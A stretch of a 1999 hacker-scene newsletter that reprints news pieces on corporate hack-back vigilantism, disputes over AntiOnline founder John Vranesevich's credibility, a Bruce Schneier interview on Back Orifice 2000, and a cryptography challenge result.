case, he said college-aged hackers in hte Czech Republic were worming their way toward a banks credit
card database. Another incident involved hackers in India trying to fake an electronic funds transfer.
But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents
broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the
card numbers to render them useless.
Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation
with a hacker. Often, thats enough, he says.They are very surprised when we come to visit, when
we bridge to the physical world, he said.
CNN;
Cyber-vigilantes hunt down
hackers
January 12, 1999
Web posted at: 12:19 a.m. EDT (1219 GMT)
by Winn Schwartau
From...
(IDG) -- In September 1998, the Electronic Disturbance Theater, a group of activists that
practices politically driven cyber civil-disobedience, launched an attack aimed
at disabling a Pentagon Web site by flooding it with requests.
The Pentagon responded by redirecting the requests to a Java applet programmed to
issue a counteroffensive. The applet flooded the browsers used to launch the attack with
graphics and messages, causing
them to crash.
The incident raises issues all user organizations will soon have to grapple with,
if they haven't already. When you detect a break-in, should you launch a
counterattack in order to protect your network? Is law enforcement capable
of stopping cybercrime and can it be trusted to keep investigations quiet? If
not, do corporations have a right to defend themselves?
Some emboldened user organizations are answering "yes." They are striking
back against hackers, sometimes with military efficiency and intensity, in an
effort to protect their self-interests. In the process, they are fueling a debate
over what is legal and ethical in terms of corporate vigilantism.
One end of the opinion spectrum says law enforcement agencies
are generally not up to the task, so corporations have a fiduciary
responsibility to protect their interests. The only question for
these companies is how far they are willing to go. Will they break
laws, and if so, which ones? The opposite view is corporate vigilantism is wrong:
Taking the law into one's own hands only makes things worse.
The First Vigilante Corp.
Lou Cipher (a pseudonym of his choice) is a senior security manager at one of
the country's largest financial institutions. "There's not a chance in hell of us
going to law enforcement with a hacker incident," he says. "They can't be
trusted to do anything about it, so it's up to us to protect ourselves."
Cipher's firm has taken self-protection to the extreme. "We have the right to
self-help - and yes, it's vigilantism," he says. "We are drawing a line in the
sand, and if any of these dweebs cross it, we are going to protect ourselves."
Cipher says his group has management approval to do "whatever it takes" to
protect his firm's corporate network and its assets.
"We have actually gotten on a plane and visited the physical location where
the attacks began. We've broken in, stolen the computers and left a note: 'See
how it feels?' " On one occasion, he says: "We had to resort to baseball bats.
That's what these punks will understand. Then word gets around, and we're
left alone. That's all we want, to be left alone."
A senior vice president of security at a major global financial firm speaks of
the matter in military terms. He equates a hacker intrusion to a "first strike,"
and says defense is an appropriate response. "If you use measures to restore
your services, that's defense, not offense," he says. When asked how far his
company goes, he concedes only, "I am willing to defend myself."
In interviews with dozens of companies, a surprising number are seriously
considering implementing "strike-back" capabilities. However, when asked,
most companies would not admit they have already taken such steps.
Bruce Lobree, an internal security consultant
at a major financial institution, is cautious
about admitting his firm uses vigilante
activities and strike-back techniques. He
says with a smile, "I can't answer yes or no.
That's proprietary. Besides, legally we can't.
But I can tell you that everything that occurs
at our network perimeter and inside our
networks is recorded."
A recent study, "Corporate America's
Competitive Edge," conducted by Warroom
Research, a competitive intelligence firm in
Annapolis, Md., shows that 32% of the 320
surveyed Fortune 500 companies have
installed counteroffensive software.
Warroom President Mark Gembecki notes
that not every company will send out thugs to
enforce their firewall policies.
Cyber-response is OK, he says, but Cipher's
physical retaliation is "a clear and overt
violation of civil rights."
Such extreme counteroffensive methods
raise the hackle of even the staunchest
corporate information warrior. Lloyd Reese,
program manager of information assurance
for Troy Systems, a technical support
company in Fairfax, Va., has a criminal
justice background and says physical
response is illegal and "doomed to failure."
Such responses will only invite further
attacks - perhaps even more intense, he
says.
"Companies need to follow the appropriate legal process. We already have
chaos on the Internet, why should we make it worse?"
Joseph Broghamer, information assurance lead for the U.S. Navy's Office of
the Chief Information Officer, goes further, saying even the Pentagon
shouldn't have done what it did. "Offensive information warfare is not a good
thing . . . period. You want to block, not punish," he says. "There is no
technical reason to react offensively to a hacker attack." His opinion is shared
by precious few.
As part of its information security practice, Ernst & Young has been asked
about strike-back capabilities and how hostile perimeters might be used for
defense.
Dan Woolley, national leader of market development for the firm, says he
knows of "companies in finance, insurance and manufacturing that are
developing and deploying the capability to aggressively defend their networks."
He is quick to point out, however, "We don't do it for ourselves even though
we are attacked regularly."
The questions security software vendors and consultancies like Ernst &
Young are now grappling with are wrenching: Should they develop offensive
software, offer it to their clients, deploy it and support it? And if so, how open
should they be about it?
How they do it
It's easy to understand why companies are interested in the idea of corporate
vigilantism. Even the best layers of defense - firewalls, passwords and access
control lists - can't work alone for many reasons. Among them:
Network topology, users and software are constantly changing. There
is no way to keep up.
New vulnerabilities are found - and exploited - daily.
A small number of individuals with little technical skill can launch
massive online attacks.
Once an attack is detected, corporate vigilantes have various methods
of evening the score.
The Navy's Broghamer argues that sometimes the best response to an
attack is to shut down the network connection altogether, although he
acknowledges the Navy is not as sensitive to uptime and customer
perception as the private sector.
Another approach is to send a strongly worded message to the source
IP address or to an ISP in the path. Traceroute is a tool that can
identify source IP addresses. But you have to get the assistance of
ISPs down the line to trace additional hops on the Internet, because
each hop has to be covered in order to find the real source. That's all
legal, but you may need to pressure the ISP into working with you
quickly to identify the next hop in the chain. Once you collect this data,
it can be handed over to law enforcement officials - who may or may
not react.
In 1994, Secure Computing, a security vendor in Roseville, Minn., introduced
Sidewinder, a novel firewall with strike-back capabilities. If it senses an
attack, it launches a daemon that will trigger the offensive techniques of your
choice. Other companies indicate they will soon be offering a range of
strike-back products.
A company crosses the line when it responds by unleashing a
denial-of-service attack against an intruder, as the Pentagon did. This can be
done via massive e-mail spamming, the Ping of Death and hostile Java applets.
No matter what offensive mechanism you choose, the trick is to identify the
culprit before returning fire. Should you fail to recognize that the attacker
spoofed the identity of another company, you may find yourself attacking J.C.
Penney, NBC or General Motors. Innocent companies would not take kindly
to that sort of activity - no matter the reason - and ISPs don't appreciate being
the vehicle for Internet-based attacks.
Indeed, one of the big dangers with corporate vigilantism is how easy it is to
overreact to an apparent attack. In spring 1997, one of the Big Six accounting
firms used scanning tools from Internet Security Systems (ISS) to assess the
security of a major ISP that controlled a huge amount of Internet traffic.
When a network administrator on duty at the ISP noticed a thousand
simultaneous connections to his firewall, he reacted quickly and shut down
several routers. "His manual reaction took down 75% of the Internet," says
Tom Noonan, president of ISS. "Anyone using Sprint at that time was in a
world of hurt."
Even those with a strong inclination for vigilantism note that counteroffensive
responses are fraught with danger. "Talk to your lawyers," Troy Systems'
Reese advises. "Keep in mind that your strike back has to go through a long
path, and you might do damage at any place along the way." Retribution can
cause a hair-trigger response that could cause damage to systems in the path
from you to the attacker.
"You really have to understand what you're doing," says Ray Kaplan, a senior
information security consultant with Secure Computing. "Your first response
might invite further attack, exactly the opposite of what you intended. You
have to consider your firm's public relations posture and how the Internet
community as a whole will react to your actions."
Don't ask, don't tell
As for how law enforcement will view vigilantism, the answer from many
companies is a resounding, "Who cares?"
Vigilantism is emerging as a response to the intense frustration people feel
with law enforcement authorities they view as simply not up to snuff.
Complaints from top firms in the U.S. range from downright ineffectiveness
("clueless" is an oft-repeated word) to a lack of staff, lack of funding, courts
that are too crowded with cases and the snail-like speed at which typical law
enforcement investigations run.
"One reason you see vigilantism is because law enforcement doesn't get the
job done," says Fred Cohen, president of Fred Cohen and Associates and
principal scientist at Sandia National Laboratories. "Law enforcement might
investigate if you have a lot of political clout and you do all of the leg work."
Companies are also fearful of what might happen if they do bring in law
enforcement. "It's a hell of a situation when victim companies are more fearful
of the FBI than they are of the attackers," says Michael Vlahos, senior fellow
at the U.S. Internet Council. He echoes the worry that sensitive corporate
information will not be protected if handed over to law enforcement.
"Law enforcement is helpless," ISS's Noonan maintains. "It's not like Israeli
fighters who train every day for every contingency. Conventional law
enforcement just can't match the skills needed. Besides, you can't trust law
enforcement to keep your secrets from becoming public knowledge."
Predictably, law enforcement does not favor the vigilante view - at least
publicly. "If someone were to attack us, we are not encouraged to swat back,"
says Lt. Chris Malinowski of the New York Police Department, who
specializes in cybercrime. "If companies take any of these proactive defensive
steps, they are taking a big chance, subject to criminal prosecution."
Dave Green, deputy chief of the Computer Crimes and Intellectual Property
Section for the U.S. Department of Justice, says he relates to the frustration
over law enforcement's inability to respond, but adds that his department can
only recommend protective measures. Yet he stops short of advising against
corporate vigilantism outright. When asked if companies should hack back at
attackers, Green responds, "no comment," as he does to questions as to what
could legally be considered an attack. "But I can say that law enforcement is
gearing up and is much better equipped to deal with cybercrime," he adds.
When they are not speaking for attribution, law enforcement authorities of all
stripes go further than Green. Local police, state police, the FBI, Secret
Service, Interpol and Scotland Yard members all say the same thing -
unofficially: "We can't handle the problem. It's too big. If you take care of
things yourself, we will look in the other direction. Just be careful."
Security consultant Lobree seems to understand the police mentality and
applies the red light theory to cybervigilantism. "Suppose it's the dead of night
on a country road, and you come upon a stop light. You can see for miles in all
directions. Are you going to run the light even knowing there is virtually no
chance of being caught?" Some, perhaps most, won't, because they have an
innate fear of being caught. Others will forge ahead. "A lot of companies
recognize that the chance of getting caught in a vigilante cyberstrike is pretty
darn low," he says.
It's your call
A number of sources suggest vigilantism might be a business opportunity for a
firm that wants to specialize in counteroffensive network security. "In the
1860s, law enforcement was conducted by Pinkerton, a private company,"
Vlahos says. Many suggest that privatization should be the case in the
cyberworld as well. The kind of offensive network security products needed
to make it happen are starting to find their way into corporate tool kits and
onto the Internet.
But the legal challenges that coexist with hostile perimeters and
counteroffensive measures are daunting. The astute company will examine
every aspect of its posture before marching down the slippery slope of
vigilantism. Sometimes the best defense is not to overreact. In the worst case,
do nothing until a proper response can be developed. Vlahos says courts may
be the place to create new laws more attuned to the technology. "This is a
whole new arena, and I don't know how we can explore it without trying new
approaches, even if they are technically illegal."
Cipher, the baseball-bat-bearing vigilante, is all for new approaches. "Personal
persuasion is always more effective than electronic persuasion," he says.
"Personal persuasion virtually guarantees that a hacker will see the error of his
ways, scamper to please and turn over a new leaf."
No matter what path you choose, make sure it is well thought out and that you
have your legal ducks in a row. You just might need them.
Schwartau is chief operating officer of The Security Experts, a global
security consulting firm, and president of infowar.com. He can be
contacted at winn@infowar.com.
@HWA
20.0 Forbes Calls AntiOnline Bluff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by grendel
Adam Peneberg takes a close look at John Vranesevich,
founder and web master of AntiOnline. The article offers
a close examination of previous threats of litigation by
Mr. Vranesevich and discovers just how easy it is to
become a 'reliable media source'. Mr. Peneberg calls his
bluff and issues a challange to 'Go Ahead and Sue".
Forbes
http://www.forbes.com/columnists/penenberg/
(articles change daily, check the archives... -Ed)
CyberWire Dispatch August 1999 - Refered to in Forbes Article
http://www.hackernews.com/orig/CWD0899.html
Ottawa Citzen - Mirror Refered to in Forbes Article
http://www.attrition.org/negation/ottawa.html
Forbes;
IT'S A SAD FACT, but whenever someone is cited as an expert in one publication, he is almost sure to be
quoted in another--and another and another. The reason is simple: The first thing a journalist does when
beginning a story is to see what else has been written on the topic. Culling sources from other news
articles is a good way to get started.
The problem is, few reporters check out these "experts," figuring that if a source made it into, say,
The New York Times or The Washington Post, he must be reliable and, well, expert. Think of it as an
extension of Howard Stern's media strategy. Stern once said he himself first coined the term "King of All
Media," figuring that the mainstream press would then start to call him that. (It did.)
How else to explain the schizophrenic emergence of twenty-year-old John Vranesevich, founder and operator
of antionline.com, a web site that purports to follow the hacker scene. In the realm of mass media, "JP"
has become a star, a youthful public figure who has been quoted extensively for his computer-security
expertise and inside knowledge of the hacking world.
But in hacker circles he is a pariah. Perhaps only his close ally, Carolyn Meinel (a.k.a. "The Happy Hacker"),
inspires more vitriol. At this year's Defcon, the hacker conference held in Las Vegas, Meinel had the dubious
honor of being bodily ejected from the convention hall.
It's hard to gauge just how elite JP's hacker and computer-security skills are. But we do know his web site was
taken down in August when someone with an account in Russia tricked AntiOnline into downloading software that
redirected its visitors to another site. The hacker, obviously not a fan of JP's, included this message:
"Expensive security systems do not protect from stupidity."
And online columnist Lew Koch, of CyberWire Dispatch, interviewed JP at length, exposing vast gaps of knowledge.
For instance, Koch questioned JP about AntiOnline's alleged scoop of the hack of an atomic research center last
year, yet he couldn't remember which country housed the center. JP kept insisting it was Israel, and, according
to Koch, called the Bombay Atomic Research Center the "B'Hadvah Atomic Research Center." When Koch corrected
him, JP admitted it must have been India. JP also claims he has "semi-contractual" relationships with NASA and
the Defense Informations Systems Agency (DISA), yet Koch says both agencies deny this.
But the mass media appears ignorant of this. The New York Times turned to Vranesevich when it needed comment on
a rash of anti-government hacks, while The Wall Street Journal Europe dubbed him an "online-security specialist."
The Baltimore Sun asked for his opinion on the hack of the Johns Hopkins' medical school site. The Orange County
Register invited him to bash hacker/martyr Kevin Mitnick, which he did with glee, saying that hackers don't have
a clue about Mitnick's case, they "just heard it's cool to support Mitnick, and that is what they do." And the
San Diego Union-Tribune dialed him up to ask about the threat of computer viruses.
Of course, JP has nothing against good press. It's the bad press that let's him unsheath his sharpest weapon. No,
not the facts; those would only get in the way. We're talking about the threat of a lawsuit.
In June, JP contacted Harvard University to complain about a computer-security web site rival called PacketStorm,
which had posted some nasty pictures, along with even nastier commentary. Harvard, afraid of a lawsuit, pulled the
site, which was a favorite of computer-security professionals. JP claims on his web site that he didn't explicitly
threaten lawsuit, but the University certainly took it that way. A Harvard spokesman told me this was the first
time Harvard had ever pulled the plug on a site for "objectionable material." (Eventually, PacketStorm found a home
with Kroll-O'Gara, the big-time detective agency in New York.)
Then in July, The Ottawa Citizen ran a story about JP, reporting allegations that JP is under investigation by the
FBI for "employing hackers to target high-profile sites in order to scoop the rest of the media with exclusive
reporting." Vranesevich contacted the newspaper and threatened to sue. Although Mark Anderson, The Citizen's high
tech editor, said he was confident in the story, the FBI would not comment whether it was in fact investigating JP
or not, even though several other sources in the know insisted he was. As a result, the Citizen removed the story
from its web site, rather than face a potential lawsuit.
"It's sad," Anderson says. "You're confident you have reliable information, but the threat of a lawsuit forces you
to pull your story. The onus was on us to prove that Vranesevich is under investigation by the FBI, but the FBI
wouldn't say it outright. Since Canadian libel law is tougher than American libel law, we felt we had no choice."
In addition, folks trolling around cyberspace say that Vranesevich has threatened them with lawsuits whenever they
post anything negative about him on their web sites. I wonder what he would do if someone actually took him up on
this, since lawyers are expensive and, by all accounts, JP's business is far from being a cash cow. Perhaps, after
reading this, he'll even sue me.
CyberWire Dispatch;
Note: CyberWire Dispatch is a mailing list only newsletter.
It is reprinted here with permision. Subscription
information is at the end.
CyberWire Dispatch // August 1999
// All Rights Reserved
Jacking in from the "Pine-Sol" port:
By Lewis Z. Koch
CWD Special Correspondent
Twenty-year-old John Vranesevich calls his AntiOnline
Web site "a valuable tool in the fight against 'CyberCrime'"
In a call to arms, this self-anointed, junior G-man
wannabe, promises to uncover, reveal and inform on
hackers and other miscreants.
Out of this misguided cyber-vigilantism, arises the
"denunciator" virus, which reaches its full lethality in
totalitarian states but also finds a home in democratic
societies as well, usually in climates of social resentment,
political fanaticism, or, my personal favorite, political
self-righteousness.
The Denunciator virus, known also as the "Accuser" virus,
destroys careers, leaves permanent scars, called
"blacklists," gives rise to false alarms, warnings or
contrived "cautionary tales" meant to lull or divert
citizens. The natural host for this virus is believed to be a
species of the rodent called a "snitch," aka squealer, stool
pigeon, informer; rat bastard.
Every delusional crusader needs a mission statement,
Vranesevich is no different. This self-anointed
sheriff-of-cyberspace pens this Uber-warning to hackers:
"I know that some of you are playing what you feel is a
game. A game that you think you are winning. Some of
you sit back and laugh at organizations like the FBI. You
make sure that you provide enough information to make it
obvious who you are, yet are careful not to provide
enough information to actually have it proven. I have
been watching you these past 5 years. I know how you
do the things you do, why you do the things you do, and I
know who you are."
And if you're keeping score-and you should be-you'll note
that Vranesenvich apparently started down this crusader
road at the tender age of 15 or just about the time he
figured his Johnson could be used for more than simple
utilitarian bodily functions.
This not-very subtle paean to cyber-vigilantism could
easily be dismissed save for the fact that Vranesenvich
has earned a demi-celebrity status from journalists
working for publications from which we have come to
expect more judicious sourcing, including, but not limited
to, Matt Richtel of The New York Times, John Schwartz of
The Washington Post and even, sadly, CWD's own Brock
Meeks while cloaked in his alter-ego as Washington
correspondent for MSNBC.
And we wonder why fewer and fewer people trust the
media.
Hung With His Own Rope
=====================
In his mission statement Vranesevich unequivocally
states, "I've seen myself talking with people who have
broken into hundreds of governmental servers, stolen
sensitive data from military sites, broken into atomic
research centers."
Question is, can we believe him?
There's his rather perplexing story about hackers breaking
into an "Israeli" atomic research center.
At first, as Vranesevich tells it, when hackers told him
what they had done, he "freaked" even thought the boast
might be "far fetched." But these hackers sent him a
"folder full of documents written in a foreign language"
they claimed they had copied from the "B'Hadvah" Atomic
Research Center. [Note: Vranesevich didn't know how to
spell the name of the so-called research center].
"Were the documents in Hebrew or English?" I asked.
"Bengali."
When he broke the "story" on his AntiOnline web site, all
media hell broke loose.
"Every mainstream media started calling and questioning
and calling the research center," Vranesevich said. "I had
all these nuclear arms proliferation people calling. Here I
am in my parent's living room, and one day, thirteen calls
from anti-nuclear proliferation and pro-nuclear proliferation
(sic) groups wanting to know - is this significant, what is
Israel doing?"
I was still having a problem with the "Bengali" aspect to
the documents.
"Ah, John," I asked, "is this an Israeli research center or
could it be Indian? Pakistani?"
Silence. Then Vranesevich said, "I think it's Indian. Who
was the one that just did the nuclear testing?"
"That was India and Pakistan, not Israel."
"Oh, then this was India, not Israel."
Oh.
Then there's his story about changing medical
records-pretty serious stuff. Can we take him at his word
there?
"[I]'ve seen people change the medical records of
individuals in our armed services" Vranesevich asserts in
his "mission" statement.
When asked about these nefarious deeds, Vranesevich
works himself up into a high dudgeon about hackers
breaking into sites and changing medical records.
"What would have happened if medical records had been
changed and a cancer patient received the wrong
treatment for it?...What if I had looked into who these
[hacker] guys were, a little further? What would have
happened if I would have published the story? What would
have happened if CERT had come out and said medical
records had been changed and a cancer patient received
the wrong treatment because of it!"
I questioned him closely. "You really saw people change
the medical records of individuals in our armed forces?"
"I don't mean that literally," backtracking as fast as his
voice could carry him. "You see the language I was using?
I don't mean literally 'I saw them do it, I saw it happen.'
It's something that transgressed (sic) before. It's like we
saw our country go through three wars. It doesn't mean I
caused (sic) the three wars. You see what I'm saying? Or
I've seen crime happen over and over again in my
neighborhood. Doesn't mean I literally saw it. You know
what I mean? I don't know if I'm making myself clear." Ah,
er.. right. He gave it one more chance.
"Looking back in retrospect (sic). It was like actions that
transgressed (sic) before. I've sort of watched the events
transfold (sic) before my eyes."
Yep, that clears it up; someone get this guy an English
tutor...There's more like that but after a while it gets,
well, boring.
Vranesevich also claims a "semi-contractual" relationship
with all kinds of official military and police types, including
one with the NASA and one with the Defense Information
Systems Agency (DISA).
Can we believe him?
NASA says no. After checking with their databases "they
could find no record of NASA having done business with
Mr. Vranesevich or his company AntiOnline," reports
Patricia M. Riep-Dice, NASA Freedom of Information Act
Officer.
According to a DISA spokesman, no such relationship
exists. None. Nada.
In Other People's Words
=======================
In his grasp for distinction, celebrityhood, acclaim,
Vranesevich overreaches, as he did with his claim of
unethical behavior on the part of computer security expert
Marcus Ranum. Ranum's "crime"? "Guilt-by-association"
with two hacker groups, L0pht Heavy Industries and cult
of the Dead cow (cDc).
L0pht Heavy Industries is among the finest Microsoft
error-catchers in the world; it is a company with
employees and it pays taxes. "cult of the Dead cow" is a
group of hackers in the tradition of Yippie founders Abbie
"Steal This Book" Hoffman and Jerry Rubin.
The cDc promises Internet chaos, anarchy and terror; in
1968, in Chicago, Abby Hoffman and Jerry Rubin
threatened to pour LSD in the water and send Yippie
studs to O'Hare airport to seduce the wives of delegates
to the Democratic National Convention. If that analogy is
lost on you, cut your losses now, stop reading and return
to your "Internet for Dummies" workbook.
L0pht and cDc tend to despise Microsoft, but then so do a
lot of people, including folks in the Justice Department.
More than likely there is cross-over contact between
L0pht and cDc since the two have much in common, in
the same way journalists from different newspapers and
television tend to hang out at the same bars, buy each
other drinks and complain about stupidity and venality of
their editors.
cDc had been tinkering around the multiplicity of holes,
vulnerabilities and general screw ups in the Microsoft
Windows operating system. They developed a
back-dooring program for Win 95, one that allowed a
Trojan Horse to exploit that vulnerability.
In a stroke of genius that would make an Wizard of
Madison Avenue green with envy, they dubbed the
program "Back Orifice."
Ranum developed a program to counteract Back Orifice
and called it "Back Officer Friendly." Vranesevich claims he
was "shocked, shocked" to discover that Ranum might
have had conversations with hackers at L0pht, perhaps
even some at cDc about Back Officer Friendly.
Vranesevich's story alleged that Ranum could have even
been talking with the very people at cDc who developed
the exploit in the first place. So what do we have here?
Collusion? Duplicity? Ethical lapse? Double-agentry?
Whom to believe?
================
Bell Labs' William R. Cheswick, co-author with Steven
Bellovin of the exemplary "Firewalls and Internet Security -
Repelling the Wily Hacker," says of Ranum: "I have worked
with Marcus for years. He is a strong force for Good
against Evil. A security person is paid to think bad
thoughts, and Marcus is quite good at it. The key is that
he doesn't do the bad stuff, but uses this approach to
make things safer."
Bellovin, himself a world-class computer expert, certainly
doesn't equivocate. Ranum has "been a strong, positive
force for Internet security, both in the sense of building
useful tools and in the sense of teaching other people
important principles. I've also never heard any serious
question about his ethics."
"Marcus has one of the most fluent understandings of
Internet security I have ever seen," says Bruce Schneier,
whose books on encryption and on privacy can trigger a
physical and intellectual hernia, "his ability to see threats
and attacks, defenses and countermeasures, makes him
one of the most valuable resources we have in computer
security world," Schneier said. Marcus' "association with
the L0pht recognizes that there is considerable expertise
in the hacking community that can be leveraged in the
fight against computer crime. Marcus is just smarter than
other people, because he realized it and figured out how
to use it No kidding; he's that good."
So you do the math: self appointed cybervigilante John
Vranesevich, with his stolen "Israeli" atomic secrets
written in Bengali, changed medical records that weren't
changed, unsubstantiated relationships with NASA and
DISA (and that's just for openers), and, on the other
hand, Marcus Ranum and people like Cheswick, Bellovin,
and Schneier.
The best way to deal with "Denunciator" virus is simply
silence; don't feed the hype.
========================================
EDITOR'S NOTE: CyberWire Dispatch, with an Internet
circulation estimated at more than [500,000], is now
developing plans for a once-a-week e-mail publication.
Every week, one of five well-known investigative reporters
will file for CWD. If you think your company or organization
would be interested in more information about establishing
an sponsorship relationship with CyberWire Dispatch,
please contact Lewis Z. Koch at lzkoch@wwa.com.
===================
To subscribe to CWD, send a message to:
Majordomo@vorlon.mit.edu
No subject needed.
In the first line of the message put:
Subscribe CWD
To remove yourself from this list, send a mesasge to:
Majordomo@vorlon.mit.edu
No subject needed.
In the first line of the message put:
Unsubscribe CWD
----
From: http://www.attrition.org/negation/ottawa.html
Ottawa Dispatch;
[THere is a chance this article was removed because of the
legal threats made by John Vranesevich against the Ottawa
Citizen. It is preserved here for posterity.]
http://www.ottawacitizen.com/hightech/990719/2623591.html
The Ottawa Citizen Online Business Page
Monday 19 July 1999
Spy vs. spy in the hacker underworld
Network security expert is under investigation for attacks on U.S. government Web sites
Bob Paquin
The Ottawa Citizen
In the murky world of hackers and crackers, appearances can be deceptive. "White hat" good guys,
working for software or security firms, have occasionally been caught moonlighting as "black hat"
rogues.
Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated
hacker Web site AntiOnline. Mr. Vranesevich is currently under investigation by the FBI with regard
to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to
target high profile sites in order to scoop the rest of the media with exclusive reporting.
Mr. Vranesevich has denied the allegations.
Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site
(www.attrition.org/negation/special) which details a series of links between Mr. Vranesevich and an
alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S.
Senate Web site hack earlier this month.
Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking
questionable AntiOnline reporting over the past year.
Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and
authoritative sources on hacking and security-related information.ÊBegun in late 1994 as a 5-megabyte
high school hobby Web site, AntiOnline has since grown into a multi-domain business venture.
ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking."ÊBesides reporting on
hacking news, the site offers a downloadable library of hacking software tools, archives of several
hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories.
While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly
built up a number of enemies among the hacker underground.
Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted
in raids on 20 suspected hackers across six states, Mr. Vranesevich declared a dramatic change of
stance, distancing himself from the subjects he covers.
In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've
found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself
talking with people who have broken into hundreds of governmental servers, stolen sensitive data from
military sites, broken into atomic research centres, and yes, people who have even attempted to sell
data to individuals that presented themselves as being foreign terrorists É Many times, I knew about
these instances before hand, and could have stopped them."
He also claimed to have been secretly working with the U.S. Airforce to develop a "profile of a
hacker" for use in fighting "CyberCrime".
Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You
yell and scream about freedom of speech, yet you destroy sites which have information that disagree
with your opinions.ÊYou yell and scream about privacy, yet you install trojans into others' systems,
and read their personal email and files. You truly are hypocrites.ÊAll of these grand manifestos that
you develop are little more than excuses that you make up to justify your actions to yourself."
Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent
follow-on reporting in other media outlets, have been exaggerated and sensationalized.
"Not only had AntiOnline driven the media hype behind the stories, they put various government and
Department of Defense organizations on full alert preparing for the fallout these attacks would
cause," he states on his own Web site.
In detailing the relationship between Mr. Vranesevich and the alleged hacker in questions, Mr. Martin
notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may
have been responsible for creating some of the news to report on É he pays people to break into sites
in order to report on it as an exclusive."
@HWA
21.0 BO2K, good or evil? The Debate Continues.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by bradcc
Bruce Schneier, chief technology officer at Counterpane
Internet Security, offers some comments on Back Orifice
2000. Is it an evil 'hacker tool' or remote adminstration
software?
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13024,00.html
How Bad Is Back Orifice?
Hacker tool is only as malicious as the hands it
falls in--but Windows users beware.
by Ann Harrison, Computerworld
September 28, 1999, 8:22 a.m. PT
Is Back Orifice simply a cool hacking tool or a
malicious weapon? Depends on who you ask. Some
people think the remote administration tool for
Microsoft Windows is not as malicious as it's made out
to be. Bruce Schneier, chief technology officer at
Counterpane Internet Security, is one of them.
Computerworld reporter Ann Harrison spoke with him
recently about the free open source tool, which he
insists has gotten an undeservedly bad reputation.
Q: How does BO2K work?
A: There are two parts: a client and a server. The server
is installed on the target machine. The client, residing
on another machine anywhere on the Internet, can now
take control of the server.
Perfectly respectable programs, like pcAnywhere or
Microsoft's Systems Management Server [SMS], do
the same thing. They allow a network administrator to
remotely troubleshoot a computer. If the server is
installed on a computer without the knowledge or
consent of its owner, the client can effectively "own"
the victim's PC.
Q: Why has BO2K acquired a reputation as only a
hacker's tool?
A: Back Orifice's difference is primarily marketing spin.
Since it was written by hackers, it is evil. That's wrong;
pcAnywhere is just as much an evil hacking tool as
Back Orifice. Not only can the client perform normal
administration functions on the server's computer, but it
can also do more subversive things: reboot the
computer, turn the microphone or camera on and off,
capture passwords.
Q: How does BO2K run in stealth mode?
A: Unless the server's owner is knowledgeable, and
suspicious, he will never know that Back Orifice is
running on his computer. Other remote administration
tools, even SMS, also have stealth modes. Back
Orifice is just better at it. Back Orifice will be used by
lots of unethical people to do all sorts of unethical
things.
Q: Back Orifice can't do anything until the server
portion is installed on some victim's computer, right?
A: Yes. This means that the victim has to commit a
security faux pas before anything else can happen. Not
that this is very hard; lots of people network their
computers to the Internet without adequate protection.
Still, if the victim is sufficiently vigilant, he can never be
attacked by Back Orifice.
Q: What about Microsoft?
A: One of the reasons Back Orifice is so nasty is that
Microsoft doesn't design its operating systems to be
secure. It never has. You have to make 300-plus
security checks and modifications to Windows NT to
make it secure. Microsoft refuses to ship the [operating
system] in that condition.
Malicious remote administration tools are a major
security risk. What Back Orifice has done is made
mainstream computer users aware of the danger. There
are certainly other similar tools in the hacker world,
some developed with much more sinister purposes in
mind.
Microsoft responds to security threats only if they are
demonstrated. Explain the threat in an academic paper
and Microsoft denies it; release a hacking tool like
Back Orifice and suddenly they take the vulnerability
seriously.
For more enterprise computing news, visit
Computerworld Online. Story copyright 1999
Computerworld Inc. All rights reserved.
@HWA
22.0 97bit ECC Stronger than 512bit RSA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
A group of international researchers, using
approximately 195 computers from all over the world,
after 40 days of computation, has been awarded 1st
prize in the latest round of the Certicom ECC Challenge
for successfully recovering a 97-bit ECC key. Results
bolster Certicom, ANSI X9, and NIST's recommendation
that strong security can only be achieved by using a
minimum of a 163-bit ECC key. Furthermore, result data
proves that the 97-ECC is harder to crack compared to
the 512-bit RSA which can still be found on many
commercial products today.
Computer World
http://www.computerworld.com/home/news.nsf/all/9909282ellip
(Online News, 09/28/99 12:00 PM)
Global team cracks crypto
challenge
By Stacy Collett
An Irish mathematician and his team have cracked the
seventh and toughest encryption problem as part of a
challenge by Canadian firm Certicom Corp. to prove that
one type of encryption is tougher to break than another.
The challenge involved 97-bit elliptic curve cryptography vs.
512-bit RSA (Rivest-Sharmir-Adleman), a more common
encryption method.
The solution was discovered by 195 volunteers in 20
countries after 40 days of calculations on 740 computers,
Irish mathematician Robert Harley said in a statement.
Solving the problem used approximately 16,000 MIPS-years
of computing, twice as much as solving a 512-bit RSA
problem, officials said. One MIPSyear is the computing
power of one system that can crunch a million instructions
per second running for a full year.
The team concluded that the elliptic curve encryption was
tougher to crack, but debate continues within the security
community on the issue.
Certicom launched a series of increasingly difficult
cryptography problems in November 1997 with prizes worth
up to $100,000. Andrew Odlyzko, head of mathematics and
cryptography research at AT&T Labs said the test
"demonstrates the need to keep increasing cryptographic
key sizes to protect against growing threats."
@HWA
23.0 DOE Loses Dough to Budget Cut
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Ted
An energy appropriations bill passed yesterday by the
